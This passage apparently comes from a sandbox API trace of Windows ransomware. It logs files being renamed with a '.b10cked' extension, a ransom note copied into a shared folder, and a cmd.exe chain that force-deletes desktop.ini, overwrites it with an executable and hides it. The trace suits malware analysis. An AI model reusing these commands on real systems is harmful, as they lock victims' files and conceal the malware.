lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0193.454] CloseHandle (hObject=0x120) returned 1 [0193.456] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp") returned 0x2c [0193.456] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0193.457] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd40, dwThreadId=0xa64)) returned 1 [0193.458] CloseHandle (hObject=0x1b4) returned 1 [0193.458] CloseHandle (hObject=0x120) returned 1 [0193.458] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.458] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.458] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount2=51) returned 2 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0193.459] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.459] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25024879478) returned 1 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.461] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb6, lpOverlapped=0x0) returned 1 [0193.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.462] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb6, lpOverlapped=0x0) returned 1 [0193.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=-182, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | 
out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb8 [0193.463] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb6, lpOverlapped=0x0) returned 1 [0193.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=-182, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb8 [0193.463] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb6, lpOverlapped=0x0) returned 1 [0193.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0193.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x131ab64, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx.hxn", lpUsedDefaultChar=0x0) returned 6 [0193.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16e [0193.466] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0193.467] CloseHandle (hObject=0x120) returned 1 [0193.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn") returned 0x21 [0193.468] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.468] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe08, dwThreadId=0x728)) returned 1 [0193.528] CloseHandle (hObject=0x1b4) returned 1 [0193.528] CloseHandle (hObject=0x120) returned 1 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.528] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount2=51) returned 1 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0193.528] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0193.528] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0193.528] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0193.528] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0193.528] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.529] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0193.529] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0193.529] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa4c, dwThreadId=0xb54)) returned 1 [0193.533] CloseHandle (hObject=0x1b4) returned 1 [0193.533] CloseHandle (hObject=0x120) returned 1 [0193.533] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf")) returned 0xffffffff [0193.533] GetLastError () returned 0x2 [0193.533] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0193.536] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf")) returned 0x2020 [0193.536] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.536] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0193.536] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0193.536] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0193.536] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h 
\"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0193.536] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0193.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.537] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0193.537] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0193.537] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2") returned 0x1a [0193.537] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x126 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" && ATTRIB +H 
\"C:\\USERS\\ALLUSE~1\\MICROS~2\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x126 [0193.537] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0193.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xacc, dwThreadId=0xb0c)) returned 1 [0193.542] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0195.555] CloseHandle (hObject=0x120) returned 1 [0195.555] CloseHandle (hObject=0x1b4) returned 1 [0195.555] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0195.555] FindFirstFileW (in: lpFileName="C:\\Users\\All 
Users\\Microsoft Help", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0195.555] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0195.555] GetTickCount () returned 0x37751 [0195.555] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=25234436780) returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 